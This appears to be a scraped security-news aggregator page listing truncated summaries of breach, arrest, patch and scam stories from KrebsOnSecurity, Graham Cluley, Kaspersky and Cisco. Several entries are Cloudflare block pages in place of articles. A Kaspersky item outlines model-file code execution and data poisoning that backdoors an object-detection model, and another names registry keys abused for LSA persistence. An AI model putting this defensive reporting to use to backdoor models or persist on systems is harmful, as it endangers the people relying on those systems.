Incredibly, the day after our initial interview via Telegram, Shefel proposed going into business together.

3 weeks, 3 days назад @ krebsonsecurity.com
Microsoft Patch Tuesday, November 2024 Edition
Microsoft Patch Tuesday, November 2024 Edition Microsoft Patch Tuesday, November 2024 Edition

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software.

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine.

The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server.

For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list.

For administrators in charge of managing larger Windows e…

3 weeks, 5 days назад @ krebsonsecurity.com
FBI: Spike in Hacked Police Emails, Fake Subpoenas
FBI: Spike in Hacked Police Emails, Fake Subpoenas FBI: Spike in Hacked Police Emails, Fake Subpoenas

In some cases, a cybercriminal will offer to forge a court-approved subpoena and send that through a hacked police or government email account.

But increasingly, thieves are relying on fake EDRs, which allow investigators to attest that people will be bodily harmed or killed unless a request for account data is granted expeditiously.

“Unlimited Emergency Data Requests.

Donahue said even if one customer gets a fake request, Kodex is able to prevent the same thing from happening to another.

“A lot of global police agencies don’t have stringent cybersecurity hygiene, but even U.S. dot-gov emails get hacked.

4 weeks, 1 day назад @ krebsonsecurity.com
Canadian Man Arrested in Snowflake Data Extortions
Canadian Man Arrested in Snowflake Data Extortions Canadian Man Arrested in Snowflake Data Extortions

A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake.

All told, more than 160 Snowflake customers were relieved of data, including TicketMaster, Lending Tree, Advance Auto Parts and Neiman Marcus.

On May 2, 2024, Judische claimed on the fraud-focused Telegram channel Star Chat that they had hacked Santander Bank, one of the first known Snowflake victims.

TELECOM DOMINOESMandiant has attributed the Snowflake compromises to a group it calls “UNC5537,” with members based in North America and Turkey.

“I’m not really someone that sells data unless it’s crypto [databases] or credit …

1 month назад @ krebsonsecurity.com
Booking.com Phishers May Leave You With Reservations
Booking.com Phishers May Leave You With Reservations Booking.com Phishers May Leave You With Reservations

This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen.

In November 2023, the security firm SecureWorks detailed how scammers targeted booking.com hospitality partners with data-stealing malware.

This seller claims to help people monetize hacked booking.com partners, apparently by using the stolen credentials to set up fraudulent listings.

A service advertised on the English-language crime community BreachForums in October courts phishers who may need help with certain aspects of their phishing campaigns targeting booking.com partners.

But that change came only after thieves used stolen credentials to siphon data from …

1 month, 1 week назад @ krebsonsecurity.com
Change Healthcare Breach Hits 100M Americans
Change Healthcare Breach Hits 100M Americans Change Healthcare Breach Hits 100M Americans

A few days after BlackCat imploded, the same stolen healthcare data was offered for sale by a competing ransomware affiliate group called RansomHub.

“Change Health and United Health processing of sensitive data for all of these companies is just something unbelievable.

For most US individuals out there doubting us, we probably have your personal data.”It remains unclear if RansomHub ever sold the stolen healthcare data.

This process is now free for all Americans, and simply blocks potential creditors from viewing your credit file.

If you haven’t done so in a while, now would be an excellent time to review your credit file for any mischief or errors.

1 month, 1 week назад @ krebsonsecurity.com
The Global Surveillance Free-for-All in Mobile Ad Data
The Global Surveillance Free-for-All in Mobile Ad Data The Global Surveillance Free-for-All in Mobile Ad Data

The result is that there are a number of marketing companies that now enrich and broker access to this mobile location information.

What accounts for the disparity between the number of Android and Apple devices that can be found in mobile advertising data?

Google said its MAIDs are randomly generated and do not contain IP addresses, GPS coordinates, or any other location data, and that its ad systems do not share anyone’s precise location data.

Georgetown Law’s Justin Sherman said the data broker and mobile ad industries claim there are protections in place to anonymize mobile location data and restrict access to it, and that there are limits to the kinds of invasive inferences one can mak…

1 month, 2 weeks назад @ krebsonsecurity.com
Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach
Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach

More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.

According to TV Globo, USDoD is wanted domestically in connection with the theft of data on Brazilian Federal Police officers.

Additional reporting revealed National Public Data had inadvertently published its own passwords on the Internet.

In an interview with KrebsOnSecurity, USDoD acknowledged stealing the NPD data earlier this year, but claimed he was not involved in leaking or selling it.

Toward the end of that interview, USDoD said they were planning to launch a platfor…

1 month, 3 weeks назад @ krebsonsecurity.com
Sudanese Brothers Arrested in ‘AnonSudan’ Takedown
Sudanese Brothers Arrested in ‘AnonSudan’ Takedown Sudanese Brothers Arrested in ‘AnonSudan’ Takedown

The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a.

AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers.

Active since at least January 2023, AnonSudan has been described in media reports as a “hacktivist” group motivated by ideological causes.

AnonSudan claimed credit for successful DDoS attacks on numerous U.S. companies, causing a multi-day outage for Microsoft’s cloud services in June 2023.

The two men also allegedly extorted some of their victims for money in…

1 month, 3 weeks назад @ krebsonsecurity.com
Lamborghini Carjackers Lured by $243M Cyberheist
Lamborghini Carjackers Lured by $243M Cyberheist Lamborghini Carjackers Lured by $243M Cyberheist

The parents of a 19-year-old Connecticut honors student accused of taking part in a $243 million cryptocurrency heist in August were carjacked a week later — while out house-hunting in a brand new Lamborghini.

But prosecutors in Connecticut said they were targeted “because the co-conspirators believed the victims’ son had access to significant amounts of digital currency.”What made the Miami men so convinced R.C.

One of the usernames leaked during the chat was Veer Chetal.

KrebsOnSecurity sought comment from Veer Chetal, and from his parents — Radhika Chetal and Suchil Chetal.

It is clear that other alleged co-conspirators to the $243 million heist displayed a conspicuous consumption of wea…

2 months назад @ krebsonsecurity.com
Graham Cluley Graham Cluley
последний пост 3 days, 14 hours назад
Russian money-laundering network linked to drugs and ransomware disrupted, 84 arrests
Russian money-laundering network linked to drugs and ransomware disrupted, 84 arrests

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

3 days, 14 hours назад @ tripwire.com
Smashing Security podcast #396: Dishy DDoS dramas, and mining our minds for data
Smashing Security podcast #396: Dishy DDoS dramas, and mining our minds for data Smashing Security podcast #396: Dishy DDoS dramas, and mining our minds for data

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Hosts:Graham Cluley:@grahamcluley.com@[email protected]Carole Theriault:@caroletheriaultEpisode links:Sponsored by:1Password Extended Access Management – Secure every sign-in for every app on every device.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, or join us on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Bluesky, Mastodon, or Threads …

3 days, 19 hours назад @ grahamcluley.com
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records AI chatbot startup WotNot leaks 346,000 files, including passports and medical records

An Indian AI startup that helps businesses build custom chatbots has leaked almost 350,000 sensitive files after the data was left unsecured on the web.

Ahmedabad-headquartered WotNot left a massive collection of sensitive user information - including scans of passport and identity documents, medical records, resumes, travel itineraries and more - unsecured in a misconfigured Google Cloud Storage bucket.

The Google Cloud Storage bucket it found was storing 346,381 files - all accessible to anybody on the internet, no password required.

WotNot told Cybernews that the bucket was used by free-tier users of its services, and that "the cause for the breach was that the cloud storage bucket polic…

4 days, 12 hours назад @ bitdefender.com
Ransomware-hit vodka maker Stoli files for bankruptcy in the United States
Ransomware-hit vodka maker Stoli files for bankruptcy in the United States Ransomware-hit vodka maker Stoli files for bankruptcy in the United States

Put simply, Stoli Group USA was unable to function properly or effectively due to the crippling attack.

And now, four months later, the impact of the ransomware attack has still not been remediated.

One person who won't be shedding a tear about Stoli Group USA's demise will be Russian president Vladimir Putin.

Stoli's billionaire owner Yuri Shefler has been living in exile from Russia since 2000, due to his opposition to Putin, and has been the subject of long-running legal battles with the country.

In 2022, Shefler renamed the company to Stoli from Stolichnaya as he wished the brand to distance itself from Russia and "represent peace in Europe and solidarity with Ukraine."

4 days, 16 hours назад @ exponential-e.com
Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users
Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

4 days, 20 hours назад @ tripwire.com
The AI Fix #27: Why is AI full of real-life Bond villains?
The AI Fix #27: Why is AI full of real-life Bond villains? The AI Fix #27: Why is AI full of real-life Bond villains?

In episode 27 of The AI Fix, robots catch a ball, lead a revolt, and enjoy a juicy steak.

Graham struggles with a Micro USB cable, a student struggles with a school’s anti-AI rules, and OpenAI’s Sora video generation AI is leaked by hacktivists.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Powered by RedCircleHosts:Graham Cluley:@grahamcluley.com@[email protected]Mark Stockley:@markstockleyEpisode links:Support the show:You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow Graham Cluley on Bluesky, Mastodon, or Threads to read …

5 days, 15 hours назад @ grahamcluley.com
North Korean hackers masquerade as remote IT workers and venture capitalists to steal crypto and secrets
North Korean hackers masquerade as remote IT workers and venture capitalists to steal crypto and secrets North Korean hackers masquerade as remote IT workers and venture capitalists to steal crypto and secrets

In this lust for stealing cryptocurrency and sensitive information, North Korean hackers are disguising themselves as remote IT workers, recruiters, and even venture capitalists.

James Elliott, a member of the Microsoft Threat Intelligence Center (MSTIC), described how North Korean IT workers had gained employment at hundreds of unsuspecting companies around the world.

A North Korean who manages to get hired by a company which doesn't realise they have employed a worker based in the sanctioned country clearly generates some income.

As the company describes, the members of Sapphire Sleet have impersonated venture capitalists or recruiters.

Companies are being urged to enhance their processes…

5 days, 20 hours назад @ bitdefender.com
No guarantees of payday for ransomware gang that claims to have hacked children’s hospital
No guarantees of payday for ransomware gang that claims to have hacked children’s hospital No guarantees of payday for ransomware gang that claims to have hacked children’s hospital

One of Europe's busiest hospitals is investigating if it has been hacked by a notorious ransomware gang.

I strongly suspect that Alder Hey Children's Hospital will not give in to the extortionist's demands, and will simply refuse to pay a ransom.

They are not likely to be paid, and the attack on a children's hospital only increases the chances that they will one day find their collars felt by law enforcement.

Thankfully, as with the Alder Hey attack, there was no disruption to patient care.

Yes, they may be a soft target for cybercriminals - but that doesn't mean a guaranteed pay-day if a hospital is hacked.

5 days, 20 hours назад @ bitdefender.com
UK hospital, hit by cyberattack, resorts to paper and postpones procedures
UK hospital, hit by cyberattack, resorts to paper and postpones procedures UK hospital, hit by cyberattack, resorts to paper and postpones procedures

A British hospital is grappling with a major cyberattack that has crippled its IT systems and disrupted patient care.

Wirral University Teaching Hospital (WUTH), part of the NHS, revealed on Monday that it had suffered a cybersecurity incident that continues to cause problems, and has forced its hospitals to postpone appointments and scheduled procedures.

WUTH, which manages Arrowe Park Hospital, Clatterbridge Hospital, and Wirral Women and Children's Hospital, proactively isolated its IT systems when it first detected the threat, forcing it to revert to manual processes and the use of pen-and-paper.

In a statement on its website, WUTH described the cyberattack as a "major incident", and th…

1 week, 2 days назад @ bitdefender.com
Mimic ransomware: what you need to know
Mimic ransomware: what you need to know

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

1 week, 3 days назад @ tripwire.com
Smashing Security podcast #395: Gym hacking, disappearing DNA, and a social lockout
Smashing Security podcast #395: Gym hacking, disappearing DNA, and a social lockout Smashing Security podcast #395: Gym hacking, disappearing DNA, and a social lockout

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Anna Brading.

Smashing Security listeners get $1000 off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, or join us on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Bluesky, Mastodon, or Threads to read more of the exclusive content we post.

1 week, 4 days назад @ grahamcluley.com
The AI Fix #26: Would AI kill sentient robots, and is water wet?
The AI Fix #26: Would AI kill sentient robots, and is water wet? The AI Fix #26: Would AI kill sentient robots, and is water wet?

In episode 26 of The AI Fix, an AI does surgery on pork chops, holographic Jesus wants your consent to use cookies, Mark opens the pod bay doors, our hosts discover OpenAI’s couch potato health coach, and Graham finds a robot made of drain pipes.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Powered by RedCircleHosts:Graham Cluley:@grahamcluley.com@[email protected]Mark Stockley:@markstockleyEpisode links:Support the show:You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, or subscribe for free i…

1 week, 5 days назад @ grahamcluley.com
Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records
Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records

A security researcher has blamed misconfigured implementations of Microsoft Power Pages for a slew of data breaches from web portals - including the leak of 1.1 million NHS employee records.

As Costello explains in a blog post, misconfigured access controls in Power Pages - a Microsoft software-as-a-service (SAAS) application used to help develop web portals - are exposing sensitive data to unauthorised anonymous users.

It seems churlish to blame Microsoft, the developer of Power Pages, entirely for the problem as in Costello's words it does "a great job of putting these warning banners and signs in your admin panel on Power Pages."

The challenge with those developing apps like Power Pages …

1 week, 5 days назад @ bitdefender.com
FlipaClip animation app data breach exposes details of almost 900,000 users
FlipaClip animation app data breach exposes details of almost 900,000 users FlipaClip animation app data breach exposes details of almost 900,000 users

Flipaclip, an animation creation app that is particularly popular with youngsters, has exposed the details of over 890,000 users.

The vulnerability allowed unauthorised parties to access information about the app's users from an exposed Google Firebase server.

According to Visual Blasters, it was not possible to access the most sensitive information related to FlipaClip's users such as their financial details and passwords, or users' animation projects.

Particularly vulnerable may be FlipaClip's users aged under 18, who in 2022 were reported to make up some 70% of the app's userbase.

Unfortunately, there has been a long history of misconfigured Firebase setups leaving sensitive information …

1 week, 6 days назад @ bitdefender.com
750,000 patients’ medical records exposed after data breach at French hospital
750,000 patients’ medical records exposed after data breach at French hospital

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

2 weeks, 3 days назад @ tripwire.com
Компании 🏢
Блог Касперского Блог Касперского
последний пост 2 days, 21 hours назад
Улучшения SIEM-системы KUMA в Q4 2024 | Блог Касперского
Улучшения SIEM-системы KUMA в Q4 2024 | Блог Касперского Улучшения SIEM-системы KUMA в Q4 2024 | Блог Касперского

В ходе атак на инфраструктуру различных компаний злоумышленники все чаще прибегают к манипуляции с модулями, взаимодействующими с процессом Local Security Authority (LSA).

Все три техники подразумевают подкладывание вредоносных библиотек в директорию C:Windows\system32, а также их регистрацию в ветке системного реестра SYSTEM\CurrentControlSet\Control\LSA\ с ключами Authentication Packages для T1547.002, Security Packages для T1547.005 и Notification Packages для T1556.002.

Команды в cmd.exe и powershell.exe, направленные на модификацию ветки реестра LSA и ключей Authentication Packages, Notification Packages, Security Packages.

Это событие регистрирует любые изменения, внесенные в объекты …

2 days, 21 hours назад @ kaspersky.ru
Как защититься от слежки через камеру и микрофон | Блог Касперского
Как защититься от слежки через камеру и микрофон | Блог Касперского Как защититься от слежки через камеру и микрофон | Блог Касперского

Многие представители этого семейства умеют в том числе подсматривать за своими жертвами и подслушивать их через веб-камеру и микрофон — это было актуально десять лет назад, это же актуально и сейчас.

Как физически защититься от слежки через камеру и микрофонМетоды физической защиты полезны и неудобны одновременно, и приходится идти на компромиссы, чтобы обеспечить свою конфиденциальность.

Отключить камеру и микрофон от компьютераВладельцы стационарных компьютеров, неттопов или упомянутых выше моделей ноутбуков без встроенных камер и микрофонов могут пользоваться внешними проводными аксессуарами.

Кроме того, в Сети можно найти немало инструкций о том, как самостоятельно физически отключить к…

3 days, 17 hours назад @ kaspersky.ru
Полный обзор возможностей и применения Network Detection & Response | Блог Касперского
Полный обзор возможностей и применения Network Detection & Response | Блог Касперского Полный обзор возможностей и применения Network Detection & Response | Блог Касперского

И шпионские APT, и атаки банд кибервымогателей, и любые другие угрозы, нацеленные на конкретную организацию, прикладывают существенные усилия, чтобы не быть обнаруженными и затруднить анализ их действий постфактум.

Межсетевые экраны — в своем традиционном виде защищают только периметр организации и не помогают обнаруживать подозрительную сетевую активность внутри периметра (например, захват атакующими новых компьютеров).

Более того, в организации всегда есть роутеры, IoT-устройства или сетевая периферия, на которых этой системы защиты и не может быть в принципе.

Что такое Network Detection and ResponseСистемы NDR обеспечивают детальный мониторинг трафика организации и применение к нему разл…

4 days, 16 hours назад @ kaspersky.ru
Недекларированная функциональность в системах Machine Learning
Недекларированная функциональность в системах Machine Learning Недекларированная функциональность в системах Machine Learning

В другой популярной библиотеке для машинного обучения TensorFlow модели в форматах .keras и HDF5 могут содержать «лямбда-слой», тоже по сути выполняющий произвольные команды на Python.

В документации TensorFlow можно найти предупреждение, что модель в TensorFlow при исполнении может читать и записывать файлы, получать и отправлять данные по сети и даже запускать дочерние процессы.

Ту же задачу решить можно, меняя метки для обучения в размеченных массивах данных, а также внедряя отравленные данные в процесс адаптации уже обученной модели к предметной области (Fine-tuning).

В примере из исследования популярная модель распознавания объектов на видео YOLO изменяется так, что не «видит» в кадре …

5 days, 11 hours назад @ kaspersky.ru
Атака на продавцов на площадках объявлений | Блог Касперского
Атака на продавцов на площадках объявлений | Блог Касперского Атака на продавцов на площадках объявлений | Блог Касперского

В этом году популярность получила схема с онлайн-видеозвонком: «покупатели» просят показать им товар по видео, а на самом деле выманивают коды доступа в банк.

Но есть нюанс — сначала он просит показать товар по видео.

РазоблачениеПод тем или иным предлогом, и даже не называя функцию по имени, покупатель просит включить в WhatsApp режим демонстрации экрана.

Если жертва включает демонстрацию, то мошенники видят экран ее банковского приложения и пытаются на своем компьютере войти в онлайн-банк продавца.

Мы подготовили рекомендации и советы, которые помогут вам безопасно продать или купить любой товар на любой площадке объявлений.

6 days, 19 hours назад @ kaspersky.ru
Мошенничество с подарочными подписками Telegram Premium | Блог Касперского
Мошенничество с подарочными подписками Telegram Premium | Блог Касперского Мошенничество с подарочными подписками Telegram Premium | Блог Касперского

Подписки есть на все: на музыку, кино, фитнес, защитные решения и даже на мессенджеры.

Конечно же, подарочными подписками Telegram Premium манипулируют мошенники, рассылая их направо и налево.

Фишинговая страница выглядит, как обычная страница авторизации в Telegram в браузере.

Как еще мошенники манипулируют подарочными подписками в TelegramЗа несколько лет существования Telegram Premium накопилось достаточно много сценариев мошенничества.

Еще одна типичная уловка мошенников, связанная с Telegram, — распространение APK-файлов якобы взломанного приложения Telegram с премиальной подпиской в комплекте.

1 week, 3 days назад @ kaspersky.ru
Спуфинг через CVE-2024-49040 | Блог Касперского
Спуфинг через CVE-2024-49040 | Блог Касперского Спуфинг через CVE-2024-49040 | Блог Касперского

Среди уязвимостей, на которые компания Microsoft обратила внимание последним вторничным патчем от 12 ноября, была CVE-2024-49040 в Exchange.

Казалось бы, уязвимость была исправлена, но, как выяснилось, уже 14 ноября Microsoft временно приостановила распространение апдейта для Exchange.

В чем проблема уязвимости CVE-2024-49040CVE-2024-49040 — это уязвимость с CVSS-рейтингом 7,5 актуальная для Exchange Server 2019 и Exchange Server 2016, классифицируемая как «важная».

Патчем от 12 ноября Microsoft добавила новую функцию, которая выявляет хедеры P2 FROM, не соответствующие стандарту интернет-сообщений RFC 5322, что должно было исправить ситуацию.

Оно работает в Kaspersky Security для Microsoft…

1 week, 5 days назад @ kaspersky.ru
«Черная пятница 2024»: как защитить свои финансы от мошенников | Блог Касперского
«Черная пятница 2024»: как защитить свои финансы от мошенников | Блог Касперского «Черная пятница 2024»: как защитить свои финансы от мошенников | Блог Касперского

Всеобщее помешательство на низких ценах только на руку мошенникам: их рассылки, купоны и фишинговые ссылки легко растворяются в массе реальных предложений.

Кажется, мошенники не заметили, что уже существуют и iPhone 15, и iPhone 16, и надежная защита для их пользователей.

Как итог, жертва добровольно отдает свои персональные и банковские данные и рискует потерять деньги.

«Черная пятница» для мошенниковЕсли вы считаете, что ваши данные никому не нужны или уже были слиты и не один раз, то эта история для вас.

Такая комбинация защитных функций обезопасит вас и ваши финансы от большинства мошеннических схем в «черную пятницу» и от многого другого.

1 week, 6 days назад @ kaspersky.ru
Как защититься от слежки через stalkerware и AirTag | Блог Касперского
Как защититься от слежки через stalkerware и AirTag | Блог Касперского Как защититься от слежки через stalkerware и AirTag | Блог Касперского

Слежка так проста и дешева, что ей пользуются и ревнивые супруги, и автомобильные угонщики, и даже избыточно подозрительные работодатели.

Для слежки прекрасно подойдут смартфон и один из маячков-трекеров, работающих по Bluetooth, — например, Apple AirTag, Samsung Smart Tag или Chipolo.

Согласно одному из исков к Apple, этот способ шпионажа используется в самых разных преступлениях — от слежки за бывшими до подготовки убийств.

В рамках кампании «Лаборатории Касперского» по противодействию сталкингу мы расскажем, как за вами могут следить и что с этим делать.

Как защититься от слежкиЧтобы защититься от слежки и онлайн и офлайн одновременно, мы предлагаем Kaspersky для Android.

2 weeks, 2 days назад @ kaspersky.ru
В репозитории PyPI найдены пакеты с инфостилером | Блог Касперского
В репозитории PyPI найдены пакеты с инфостилером | Блог Касперского В репозитории PyPI найдены пакеты с инфостилером | Блог Касперского

Что за пакеты и для чего они использовалисьВредоносные пакеты были загружены в репозиторий одним автором и отличались друг от друга только названием и описанием.

Но в действительности операторы этой атаки встроили в код механизм взаимодействия с демо-прокси ChatGPT, чтобы убедить жертву в работоспособности пакета.

Как оставаться в безопасностиМы оперативно сообщили администраторам PyPI о закладках в пакетах gptplus и claudeai-eng, и на данный момент они удалены из репозитория.

Мы продолжаем следить за активностью, связанной со зловредом JarkaStealer и искать прочие угрозы в репозиториях ПО с открытым кодом.

Мы также рекомендуем разработчикам с особой бдительностью изучать пакеты ПО с открыт…

2 weeks, 3 days назад @ kaspersky.ru
CVE-2024-10924, уязвимость для обхода аутентификации на WordPress
CVE-2024-10924, уязвимость для обхода аутентификации на WordPress CVE-2024-10924, уязвимость для обхода аутентификации на WordPress

Плохие новости для компаний, использующих сайты на базе WordPress с механизмом двухфакторной аутентификации, реализованным через плагин Really Simple Security.

Недавно обнаруженная в этом плагине уязвимость CVE-2024-10924 позволяет постороннему человеку аутентифицироваться на сайте под видом легитимного пользователя.

Чем опасна уязвимость CVE-2024-10924Как бы иронично это ни звучало, но уязвимость CVE-2024-10924 в плагине с названием Really Simple Security имеет CVSS-рейтинг 9.8 и классифицируется как критическая.

По сути это ошибка в механизме аутентификации, из-за которой атакующий может залогиниться на сайте как любой из зарегистрированных на нем пользователей, с полными его правами (даж…

2 weeks, 4 days назад @ kaspersky.ru
Обновление Kaspersky Password Manager | Блог Касперского
Обновление Kaspersky Password Manager | Блог Касперского

Рассказываем об обновлении дизайна в менеджере паролей Kaspersky Password Manager для мобильных устройств.

2 weeks, 5 days назад @ kaspersky.ru
Kaspersky Who Calls: инструкция по настройке | Блог Касперского
Kaspersky Who Calls: инструкция по настройке | Блог Касперского Kaspersky Who Calls: инструкция по настройке | Блог Касперского

Приобрести лицензию Who Calls можно отдельно или в составе комплексных защитных решений Kaspersky Plus и Kaspersky Premium, предохраняющих не только от телефонных мошенников, но и от множества других угроз.

Устанавливаем Kaspersky Who Calls для AndroidЕсли вы устанавливаете бесплатную версию, выберите по ссылке удобный для вас магазин приложений и скачайте Who Calls.

Если у вас на смартфоне уже были установлены другие приложения Kaspersky — например, Kaspersky Plus или Kaspersky Premium, — Who Calls предложит «Быстрый вход» в используемый вами аккаунт My Kaspersky.

Устанавливаем Kaspersky Who Calls для iOSДля установки бесплатной версии Kaspersky Who Calls для iOS перейдите на страницу прил…

2 weeks, 6 days назад @ kaspersky.ru
Простые и эффективные советы для защиты от хакеров | Блог Касперского
Простые и эффективные советы для защиты от хакеров | Блог Касперского Простые и эффективные советы для защиты от хакеров | Блог Касперского

мастер-пароль к нему, а все остальное — от создания до заполнения паролей — будет происходить автоматически.

Важные нюансы: менеджер паролей нужно установить на все свои устройства, чтобы вводить пароли с удобством повсюду.

Данные будут синхронизироваться между всеми вашими устройствами, и, сохранив пароль в смартфоне, вы сможете автоматически подставить его в поле ввода на компьютере, и наоборот.

Дважды проверяйте ссылки и вложенияНе переходите по ссылкам и не открывайте файлы, присланные в мессенджере и по электронной почте, если не знаете, от кого они, и не ждете никаких посланий.

Kaspersky Premium включает в себя менеджер паролей и одноразовых кодов аутентификации, защиту от фишинга и в…

3 weeks, 3 days назад @ kaspersky.ru
CVE-2024-43451 позволяет украсть NTLMv2-хеш | Блог Касперского
CVE-2024-43451 позволяет украсть NTLMv2-хеш | Блог Касперского CVE-2024-43451 позволяет украсть NTLMv2-хеш | Блог Касперского

Но при этом уязвимости подвержены все актуальные версии Windows.

Чем опасна уязвимость CVE-2024-43451CVE-2024-43451 позволяет злоумышленнику создать файл, который, попав на компьютер жертвы, позволит атакующему украсть NTLMv2-хеш.

Разумеется, для этого недостаточно одной CVE-2024-43451 — для полноценной атаки ему придется воспользоваться дополнительными уязвимостями, но чужой NTLMv2-хеш изрядно облегчит жизнь атакующего.

На данный момент дополнительных сведений об атаках, в которых CVE-2024-43451 применяется на практике, у нас нет, но в описании уязвимости четко говорится, что уязвимость публична, эксплуатируема и попытки эксплуатации выявлены.

Кроме того, стоит помнить, что большая часть а…

3 weeks, 4 days назад @ kaspersky.ru
Блог Group-IB
последний пост None
Cisco Security Blog Cisco Security Blog
последний пост 4 days, 17 hours назад
A New Approach to Network Troubleshooting in the Multicloud World
A New Approach to Network Troubleshooting in the Multicloud World A New Approach to Network Troubleshooting in the Multicloud World

1: Observability and network troubleshooting with Isovalent Enterprise, Amazon CloudWatch Network Monitoring and SplunkThe deep integration in practiceLet’s see how the Cisco and AWS integration would work in the real world.

Their network team had sophisticated tools for monitoring on-premises performance but found that they had gaps in their network visibility when traffic moved to the cloud.

When users complained about performance, the network team couldn’t tell if the problem was their application, the AWS network or somewhere in between.

This new solution extends ThousandEyes’ well known path visualization capabilities into the AWS network and also correlates how traffic flow impacts ap…

4 days, 17 hours назад @ blogs.cisco.com
How Cisco Uses the Isovalent Platform to Secure Cloud Workloads
How Cisco Uses the Isovalent Platform to Secure Cloud Workloads How Cisco Uses the Isovalent Platform to Secure Cloud Workloads

At Cisco, we have integrated the Isovalent platform into our infrastructure to ensure our cloud workloads are protected without compromising on performance.

The Isovalent platform is based on the eBPF (extended Berkeley Packet Filter) technology that offers a very modern approach to securing cloud-native environments.

Isovalent embeds security at the kernel level to provide identity-based security, network segmentation, and traffic visibility without the overhead that’s usually associated with legacy solutions.

That means Cisco can better protect our workloads and scale with seamless network policy enforcement in our growing cloud infrastructure.

ConclusionIntegrating the Isovalent platform…

1 week, 5 days назад @ blogs.cisco.com
The Customer Adoption Journey of Cisco Secure Workload
The Customer Adoption Journey of Cisco Secure Workload The Customer Adoption Journey of Cisco Secure Workload

This blog post explores the customer adoption journey of Cisco Secure Workload, highlighting key stages and best practices for successful implementation.

Evaluation: Exploring Cisco Secure Workload capabilitiesOnce aware of the need for a comprehensive workload security solution, the next step is evaluating Cisco Secure Workload.

Implementation: Deploying Cisco Secure WorkloadAfter selecting Cisco Secure Workload, the deployment phase begins.

Customer Journey Map to MicrosegmentationScaling: Expanding workload security across the organizationAs businesses grow and their workloads expand, Cisco Secure Workload scales seamlessly.

The customer adoption journey of Cisco Secure Workload is a ste…

2 weeks, 2 days назад @ blogs.cisco.com
Cisco Secure Workload: Leading in Segmentation Maturity
Cisco Secure Workload: Leading in Segmentation Maturity Cisco Secure Workload: Leading in Segmentation Maturity

Cisco Secure Workload is at the forefront of this shift, offering solutions to help organizations reach segmentation maturity.

Segmentation maturity is about how effectively an organization isolates its critical systems through workload segmentation to prevent lateral movement in case of a breach.

Cisco Secure Workload accelerates an organization’s journey to segmentation maturity, making it an essential component of a zero-trust strategy.

Cisco Secure Workload simplifies compliance by providing detailed visibility and fine-grained control over workload segmentation.

Cisco Secure Workload enables organizations to achieve and sustain segmentation maturity, adapting to their evolving needs.

2 weeks, 3 days назад @ blogs.cisco.com
Quantum Cryptography: What’s Coming Next
Quantum Cryptography: What’s Coming Next Quantum Cryptography: What’s Coming Next

Incorporating PQC algorithms into transport protocolsTo accommodate the new algorithms, it will be necessary to create new, or modify existing, transport protocols.

Making hardware quantum safe will therefore mean updating a variety of hardware components and functions that rely on cryptography.

For example, the Unified Extensible Firmware Interface (UEFI) needs to be adapted so it can handle PQC algorithms and keys.

PQC hardware availabilityCisco has offered quantum-safe hardware since 2013.

New quantum-safe editions of Secure Boot and Cisco Trust Anchor Technologies will be coming out soon, implementing the new NIST PQC standards.

2 weeks, 4 days назад @ blogs.cisco.com
Happy Third Birthday to Secure MSP Center
